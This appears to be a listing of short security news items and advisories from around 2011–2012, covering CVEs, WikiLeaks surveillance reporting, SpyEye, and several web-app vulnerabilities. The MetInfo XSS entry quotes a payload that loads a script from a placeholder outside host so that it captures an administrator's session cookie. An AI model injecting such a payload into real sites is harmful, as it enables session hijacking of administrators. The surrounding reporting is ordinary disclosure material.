Browser Find toolbar phishing attack
Added: 02/25/2012. Background: This tool serves a page claiming to be a list of stolen passwords. When a user sees this list, the most common response is to validate the claim by opening a Find box (Ctrl-F) and searching for his or her own password. The tool intercepts the Ctrl-F keypress and opens a...
Google to Stop Using Online CRL Checks for Chrome
In the face of mounting evidence that the CA system is inherently flawed, Google officials are in the process of making changes to the way Chrome handles certificate revocations, and no longer will be using online revocation checks. Instead, Chrome will use the existing update system in the brows...
Julian Assange interview on Spy Files
Julian Assange interview on Spy Files "Give me liberty or give me death" is a statement made famous by Patrick Henry but could easily have been stated by the new patriot of justice, Julian Assange. Julian Assange is a journalist and activist best known as the founder and public face of WikiLeaks,...
CVE-2011-4849
The Control Panel in Parallels Plesk Panel 10.4.4build20111103.18 does not set the secure flag for a cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session, as demonstrated by cookies used by help.php a...
CVE-2011-4728
The Server Administration Panel in Parallels Plesk Panel 10.2.0build1011110331.18 does not set the secure flag for a cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session, as demonstrated by cookies us...
FTPS Cleartext Fallback Security Bypass
The remote FTPS server running on the remote host is affected by a security bypass vulnerability due to accepting unencrypted commands if SSL negotiations fail. A man-in-the-middle attacker can exploit this to intercept credentials and modify files. (C) Tenable Network Security, Inc...
The Spy Files: Wikileaks expose Mobile Phone, Email Hacking capability
Wikileaks has released (https://spyfiles.org/) dozens of new documents highlighting the state of the once covert, but now lucrative private sector global surveillance industry. According to Assange, over 150 private sector...
webERP 4.3.8 - reportwriterFormMaker.php?ReportID SQL Injection
source: https://www.securityfocus.com/bid/50713/info webERP is prone to information-disclosure, SQL-injection, and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker may...
Israeli Military, Intelligence Sites Down After Threat by Anonymous
The websites of Israel’s Mossad and Shinbet intelligence services as well as the Israel Defense Forces (IDF) site were knocked offline today following a Nov. 4 threat by Anonymous. However, members of the group may not be to blame. On Nov. 4, members of Anonymous threatened a cyber-attack in...
DEDECMS full version gotopage variable XSS ROOTKITS, 0DAY-vulnerability warning-the black bar safety net
Affected versions: DEDECMS full version. Vulnerability description: the gotopage variable in the DEDECMS back-end login template does not check incoming data, leading to XSS vulnerabilities. \dede\templets\login.htm 6 5 the left and right input type="hidden" name="gotopage" value="? php if!...
Debian: Security Advisory (DSA-2311-1)
The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced source, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
TWSL2011-014: Vulnerability in Pantech Web Browser SSL Implementation
Trustwave's SpiderLabs Security Advisory TWSL2011-014: Vulnerability in Pantech Web Browser SSL Implementation https://www.trustwave.com/spiderlabs/advisories/TWSL2011-014.txt Published: 2011-09-23 Version: 1.0 Vendor: Pantech http://www.pantechusa.com Product: Link P7040P, others may be vulnerab...
Variant of SpyEye Targets Android Devices
Researchers at security firm Trusteer claim a new version of the SpyEye Trojan horse program targets mobile banking users with Android mobile phones and intercepts SMS text messages to and from the phone. However, significant obstacles may prevent it from spreading. Writing on the company’s...
Phone Hacker Forced to Disclose name, Who Told Him to Hack !
Court tells private investigator he must identify 'News of the World' executives who asked him to intercept voicemails. A private detective jailed for illegally intercepting voice-mail messages on behalf of a journalist at one of Rupert...
The latest MetInfo enterprise website management system V4. 0 XSS 0Day-vulnerability warning-the black bar safety net
Author: Noevil Post To: T00ls.Net Using the method, the online message: Name fill: NoevilSCRIPT SRC="HTTP://xxx/xss.js"/SCRIPT Content: feel free. Background the administrator to view the messages list, and automatically intercepts the Cookie, the NoXss will try to Keep Session Landing back to ta...
Indian Govt wants monitoring access for Twitter, Facebook, Skype and Google
India's authorities are already forcing Research In Motion to grant access to the encrypted email and instant messages of its BlackBerry users, and now the government is pressuring Google and Skype too. Doesn't the...
Yahoo Mail - Cross Site Scripting & Webfilter Bypass
Document Title: Yahoo Mail - Cross Site Scripting & Webfilter Bypass. Release Date: 2011-06-29. Vulnerability Laboratory ID (VL-ID): 130. Product & Service Introduction: Enjoy tons of features and fun wa...
Sniffjoke 0.4.1 - Anti-sniffing Framework & Tool For Session Scrambling
SniffJoke is an application for Linux that transparently handles your TCP connection, delaying, modifying and injecting fake packets inside your transmission, making them almost impossible to be correctly read by a passive...
Vulnerability in Google ClientLogin Protocol !
A group of security and privacy researchers from the Institute of Media Informatics at Ulm University in Germany is claiming to have discovered a serious security vulnerability in Google's ClientLogin protocol. In a recent analysis of the Android...